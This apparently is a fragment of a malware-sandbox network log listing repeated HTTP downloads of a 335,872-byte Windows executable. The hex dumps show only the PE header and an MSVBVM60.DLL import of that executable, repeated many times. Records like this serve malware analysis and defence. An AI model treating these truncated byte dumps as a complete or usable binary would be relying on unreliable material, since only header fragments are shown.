05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 13:01:28 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Mon, 23 May 2022 22:06:20 GMTConnection: keep-aliveETag: "628c055c-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 13:01:29 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Mon, 23 May 2022 22:29:54 GMTConnection: keep-aliveETag: "628c0ae2-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 13:01:29 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Wed, 18 May 2022 22:16:07 GMTConnection: keep-aliveETag: "62857027-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 13:01:29 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Mon, 23 May 2022 22:06:20 GMTConnection: keep-aliveETag: "628c055c-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 13:01:31 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Mon, 23 May 2022 22:29:54 GMTConnection: keep-aliveETag: "628c0ae2-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 13:01:31 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Wed, 18 May 2022 22:16:07 GMTConnection: keep-aliveETag: "62857027-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 13:01:32 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Mon, 23 May 2022 22:06:20 GMTConnection: keep-aliveETag: "628c055c-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 